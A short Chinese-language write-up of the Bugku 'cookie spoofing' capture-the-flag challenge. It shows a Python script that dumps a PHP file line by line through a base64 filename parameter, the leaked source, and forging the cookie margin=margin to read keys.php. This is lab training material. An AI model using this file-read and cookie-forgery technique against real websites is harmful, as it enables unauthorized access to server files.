Bugku——cookies欺骗

URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。
key.txt的内容有些不明所以，干脆去索引页面（index.php）看看源码。
index.php用base64加密后替换key.txt的base64，页面存在却没有内容，查看源码发现只有 发现给参数line一个个传入值才有源码，写Python脚本遍历出源码

import requests
a = 40
for i in range(a):
    url = 'http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw=' % i
    r = requests.get(url)
    print r.text

源码如下：

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='')
header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin')
{
  $file_list[2]='keys.php';
}
if(in_array($file, $file_list))
{
$fa = file($file);
echo $fa[$line];
}

根据源码的意思，我们将keys.php用base64加密后替换原base64，再用burpsuite使cookie传入值margin=margin 即可得到flag。